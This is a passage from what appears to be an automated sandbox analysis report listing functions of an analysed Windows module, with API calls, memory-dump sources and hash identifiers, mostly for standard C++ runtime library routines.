                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  • API String ID: 1740715915-0
                                                                  • Opcode ID: a82635dd216bcca0a63521ef913df801b832d66d79bd241db78bf2c2731b61bf
                                                                  • Instruction ID: a5cd9229b28609456bbaf0e787265b4a36fe1c13652c041313b97bb21e4ea0c5
                                                                  • Opcode Fuzzy Hash: a82635dd216bcca0a63521ef913df801b832d66d79bd241db78bf2c2731b61bf
                                                                  • Instruction Fuzzy Hash: 1051D372600F069FDB398F54D891B6A77F4EF44310F1445A9E805972A2E731EE50E790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B524E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 076138f108973fc3d2a7fc617e017dba191e8c24d82edbe6be596319ba2f0916
                                                                  • Instruction ID: 81bbec1f346dff6c8f09a1e1972429d0580ccc8693de490af490c3da31fcb010
                                                                  • Opcode Fuzzy Hash: 076138f108973fc3d2a7fc617e017dba191e8c24d82edbe6be596319ba2f0916
                                                                  • Instruction Fuzzy Hash: C521CF31605205AFEB21AF60ECA1E2A77E9FF6636670089D6FC1597150EB30ED089760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B26FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00B26FB7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                  • API String ID: 1452528299-1781106413
                                                                  • Opcode ID: 85d50588a12083377005747459f1ffb8e482a999068d96e9482c96aae4cfd4ed
                                                                  • Instruction ID: d9d5e62d86d3a74beb26eeb0f69f3f37798e984d98df6800bb27fe5a692af24d
                                                                  • Opcode Fuzzy Hash: 85d50588a12083377005747459f1ffb8e482a999068d96e9482c96aae4cfd4ed
                                                                  • Instruction Fuzzy Hash: 21219F59A1027182CB301F28A41173AA2E0EF54758F6548AFE8CDD7390EEA98C828399
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2CCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,823FDEC6), ref: 00B2CD1C
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B2CD3C
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B2CD6D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B2CD86
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                                  • String ID:
                                                                  • API String ID: 3604237281-0
                                                                  • Opcode ID: 0294664830a81d03fdfd3d27a187773a09fa540e5df61fa10869a4b0ed7349ab
                                                                  • Instruction ID: ea7a7c6d19c0db72f4e6a585e0913ae9163d3791f8589c6981878df6594cf07b
                                                                  • Opcode Fuzzy Hash: 0294664830a81d03fdfd3d27a187773a09fa540e5df61fa10869a4b0ed7349ab
                                                                  • Instruction Fuzzy Hash: F221B171941315ABD7218F54DD09FAEBBF8EB05B14F104269F518B72D0DBB46A0487E4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B327A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B327A9
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B327B3
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32804
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32824
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 4ace659dcaef62c1119dbd9e3dea1a7464063f61f028b53c8dcfe64bf3b7b2e1
                                                                  • Instruction ID: fee3f8d8d078c06764cfb66a56bac11f0d022d4df27c1376d3ecd883fbfa4255
                                                                  • Opcode Fuzzy Hash: 4ace659dcaef62c1119dbd9e3dea1a7464063f61f028b53c8dcfe64bf3b7b2e1
                                                                  • Instruction Fuzzy Hash: CC018035900229DBCB15EBA498516BE77F1FF84B20F380589E9196B292DF749E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2D7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B2D7EE
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2D7F8
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2D849
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D869
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 9b256585575e0e803334890fb2450e5d6fbb0bce955c1891269d76d0069993e7
                                                                  • Instruction ID: 87e50708c9215b100efad3ad172fee9ba389de8bbd4be6ae79898665d7b9e6a7
                                                                  • Opcode Fuzzy Hash: 9b256585575e0e803334890fb2450e5d6fbb0bce955c1891269d76d0069993e7
                                                                  • Instruction Fuzzy Hash: 3501CC36900129DFCB15FB64E8526BEB7F1FF84720F280489E4186B291CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32714
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3271E
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3276F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3278F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 78de371b52ac39b3798759668c94ddaa4c6da51c2fcb0a8efacf4723487f8db2
                                                                  • Instruction ID: 0fe0611f8f74d0cb50e0ab648f4262105187366618ee9da159d1569fe951491d
                                                                  • Opcode Fuzzy Hash: 78de371b52ac39b3798759668c94ddaa4c6da51c2fcb0a8efacf4723487f8db2
                                                                  • Instruction Fuzzy Hash: 1F019235910229DBCB15FB64D8566BEB7F1FF84720F380589F5186B292CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2D752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B2D759
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2D763
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2D7B4
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D7D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 764fc1e4eb25fbfe3c81e837963f4860adb4510ad935df217f54396e7f87d940
                                                                  • Instruction ID: bcaa7e211db368f3afd73acf7835201276518f43e7ad9f58a3116873d15c722c
                                                                  • Opcode Fuzzy Hash: 764fc1e4eb25fbfe3c81e837963f4860adb4510ad935df217f54396e7f87d940
                                                                  • Instruction Fuzzy Hash: CA01C0369001299FCB05FB64A8526BE77F1FF84720F280489E8186B291CF789E008791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B328CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B328D3
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B328DD
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3292E
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3294E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 5fcaab6a51624c4218745d520c85ba38ac8597da46067ed9bebf2c8e54f50649
                                                                  • Instruction ID: c76967cb797b9b91eededb79fd1266ca667ec6b616640f820c835ef93b7a3bf9
                                                                  • Opcode Fuzzy Hash: 5fcaab6a51624c4218745d520c85ba38ac8597da46067ed9bebf2c8e54f50649
                                                                  • Instruction Fuzzy Hash: 1801D231900229DBCB11FB64D8616BE77F1FF84720F340599F5186B291CFB49E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3283E
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32848
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32899
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B328B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 310f2ca145d0b6ccb58a63b58c3d991f3b7ad29e364b88a6142d42920d7ad0d1
                                                                  • Instruction ID: 4b773d0b19850e67beefcc7a2d5fe5c34e2c820b82eb00a72ddf9f6fe5f74eb0
                                                                  • Opcode Fuzzy Hash: 310f2ca145d0b6ccb58a63b58c3d991f3b7ad29e364b88a6142d42920d7ad0d1
                                                                  • Instruction Fuzzy Hash: 2501CC36D00129DBCB11EB64D851ABEB7F1FF84720F380589E418AB292CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3E96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3E974
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3E97E
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3E9CF
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E9EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 692d4735644e10125db7d508adb33687aea84569364af52e58f5e51cdd4364cf
                                                                  • Instruction ID: 4033e522357d0167c39cd3fe4340a2d748df48d234b8b1c3d9d648b2dbfb2b80
                                                                  • Opcode Fuzzy Hash: 692d4735644e10125db7d508adb33687aea84569364af52e58f5e51cdd4364cf
                                                                  • Instruction Fuzzy Hash: B701AD319001299BCB05AB6498116BE77F4AF84710F25068AF5246B2D2CF749E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3EA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EA09
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EA13
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3EA64
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EA84
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 5aa732bc641c95cf96bdec624a69e03567055401e1c8dcdf2cd6418cf86782ee
                                                                  • Instruction ID: 8531acd869e8fdbdabd13aef8738826bf1f9a8b95d609e36e9a9ecbd96e67f08
                                                                  • Opcode Fuzzy Hash: 5aa732bc641c95cf96bdec624a69e03567055401e1c8dcdf2cd6418cf86782ee
                                                                  • Instruction Fuzzy Hash: 7D01AD359001299BCB11FB6498516AEBBF0FF94720F29058AE4246B2D1CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32BBC
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32BC6
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32C17
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32C37
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: d3a1e60497cc2de0bb292f93e0b3d86d2479b9b273117067a464e1fc6e536e74
                                                                  • Instruction ID: 059e2d31cdedc5100b31d74f30e80324d152d702a73119bf9b311d9e48cc1aa9
                                                                  • Opcode Fuzzy Hash: d3a1e60497cc2de0bb292f93e0b3d86d2479b9b273117067a464e1fc6e536e74
                                                                  • Instruction Fuzzy Hash: 2501C031901129DBCB15FB6498156BEB7F0FF84710F344489E5146B2D1CF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3EBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EBC8
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EBD2
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3EC23
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EC43
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: dffe14bb4cee16a5592f318b544bfe6a6c261cbd2ed05f9b42f0613bddbabbc0
                                                                  • Instruction ID: 74495b79dacfc5589ddf93d45af4a937c8559bc0309d6d9bdc28cd8bf913f414
                                                                  • Opcode Fuzzy Hash: dffe14bb4cee16a5592f318b544bfe6a6c261cbd2ed05f9b42f0613bddbabbc0
                                                                  • Instruction Fuzzy Hash: C201AD329001299BCB15AB6498166BE77F1FF84720F680489E528AB2D2CF74DE008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32CE6
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32CF0
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32D41
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32D61
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 90ac7c59f51b54928638c9c1eadcc9e62de7fce1e5fccb9dbeb935c40d0d6b1f
                                                                  • Instruction ID: 776f860393916df6847815d1f980e335850fc58d197e4a34f4c08c037bea1a76
                                                                  • Opcode Fuzzy Hash: 90ac7c59f51b54928638c9c1eadcc9e62de7fce1e5fccb9dbeb935c40d0d6b1f
                                                                  • Instruction Fuzzy Hash: 1B01C031900229DBCB15FB6498516BE77F1FF84720F340599E5187B292CFB49E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3EC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EC5D
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EC67
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3ECB8
